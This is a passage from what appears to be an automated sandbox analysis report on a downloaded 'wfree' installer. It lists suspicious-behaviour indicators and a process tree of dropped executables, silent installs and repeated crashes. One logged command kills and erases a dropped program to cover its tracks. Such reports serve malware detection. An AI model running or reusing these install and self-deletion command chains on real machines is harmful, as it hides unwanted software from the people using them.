pid Process 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 4768 taskmgr.exe Token: SeSystemProfilePrivilege 4768 taskmgr.exe Token: SeCreateGlobalPrivilege 4768 taskmgr.exe Token: 33 4768 taskmgr.exe Token: SeIncBasePriorityPrivilege 4768 taskmgr.exe Token: SeDebugPrivilege 2296 taskkill.exe Token: SeDebugPrivilege 5092 powershell.EXE Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 932 powershell.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe -
Suspicious use of SendNotifyMessage 59 IoCs
pid Process 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe 4768 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4276 w1free.rar_id20808554.exe 4276 w1free.rar_id20808554.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4932 wrote to memory of 3356 4932 chrome.exe 69 PID 4932 wrote to memory of 3356 4932 chrome.exe 69 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3628 4932 chrome.exe 71 PID 4932 wrote to memory of 3560 4932 chrome.exe 72 PID 4932 wrote to memory of 3560 4932 chrome.exe 72 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73 PID 4932 wrote to memory of 1168 4932 chrome.exe 73
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\sample1⤵PID:3504
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe279b4f50,0x7ffe279b4f60,0x7ffe279b4f702⤵PID:3356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:22⤵PID:3628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2300 /prefetch:82⤵PID:1168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:12⤵PID:2228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:12⤵PID:864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:12⤵PID:3012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4312 /prefetch:82⤵PID:4768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:82⤵PID:4764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:82⤵PID:3776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:82⤵PID:4748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:82⤵PID:4684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:82⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:82⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:12⤵PID:1432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:82⤵PID:1528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1608 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:12⤵PID:1216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵PID:2140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3584 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:12⤵PID:188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:12⤵PID:2212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=772 /prefetch:82⤵PID:380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2836 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:12⤵PID:2864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:82⤵PID:2728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:82⤵PID:4920
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4768
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2844
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵PID:1948
-
C:\Users\Admin\AppData\Local\Temp\is-GT60F.tmp\is-04BPO.tmp"C:\Users\Admin\AppData\Local\Temp\is-GT60F.tmp\is-04BPO.tmp" /SL4 $50084 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:336 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:3188
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
PID:3168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 8524⤵
- Program crash
PID:3708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 9444⤵
- Program crash
PID:3768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 2564⤵
- Program crash
PID:96
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵PID:2216
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 8284⤵
- Program crash
PID:3544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 8124⤵
- Program crash
PID:4704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 8724⤵
- Program crash
PID:4688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 9764⤵
- Program crash
PID:4848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 10084⤵
- Program crash
PID:4852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 9964⤵
- Program crash
PID:4212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 10404⤵
- Program crash
PID:2064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 11844⤵
- Program crash
PID:4732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 11964⤵
- Program crash
PID:4828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 11324⤵
- Program crash
PID:4976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 9924⤵
- Program crash
PID:2388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15884⤵
- Program crash
PID:3684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 16044⤵
- Program crash
PID:536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 16284⤵
- Program crash
PID:4964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15444⤵
- Program crash
PID:4028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15564⤵
- Program crash
PID:1896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15644⤵
- Program crash
PID:1672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17724⤵
- Program crash
PID:5072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18004⤵
- Program crash
PID:1272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17604⤵
- Program crash
PID:200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18764⤵
- Program crash
PID:4308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19044⤵
- Program crash
PID:2872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18004⤵
- Program crash
PID:2348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17084⤵
- Program crash
PID:2304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18244⤵
- Program crash
PID:3724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19284⤵
- Program crash
PID:4736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18284⤵
- Program crash
PID:3496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18364⤵
- Program crash
PID:3020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19804⤵
- Program crash
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exeC:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exe /silentmix SUB=c322aa8acb58a24b92f7268bee04d5364⤵
- Executes dropped EXE
PID:1216 -
C:\Users\Admin\AppData\Local\Temp\is-29MCC.tmp\is-5Q7I8.tmp"C:\Users\Admin\AppData\Local\Temp\is-29MCC.tmp\is-5Q7I8.tmp" /SL4 $50232 "C:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exe" 804864 52736 /silentmix SUB=c322aa8acb58a24b92f7268bee04d5365⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4628 -
C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe"C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe" /silentmix SUB=c322aa8acb58a24b92f7268bee04d5366⤵
- Executes dropped EXE
PID:4396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "fdm-11.exe" /f & erase "C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe" & exit7⤵PID:3516
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "fdm-11.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 20324⤵
- Program crash
PID:1832
-
-
C:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exeC:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exe4⤵
- Executes dropped EXE
PID:764 -
C:\Users\Admin\AppData\Local\Temp\is-BLAUO.tmp\is-A0L88.tmp"C:\Users\Admin\AppData\Local\Temp\is-BLAUO.tmp\is-A0L88.tmp" /SL4 $702DA "C:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exe" 941720 527365⤵
- Executes dropped EXE
PID:1512 -
C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe"C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe"6⤵
- Executes dropped EXE
PID:3092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nq6YpvzU\tmWQ1yAGoEVPHDWNpKH2.exeC:\Users\Admin\AppData\Local\Temp\nq6YpvzU\tmWQ1yAGoEVPHDWNpKH2.exe /S /site_id=7576744⤵
- Executes dropped EXE
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\7zS4A7C.tmp\Install.exe.\Install.exe /S /site_id=7576745⤵
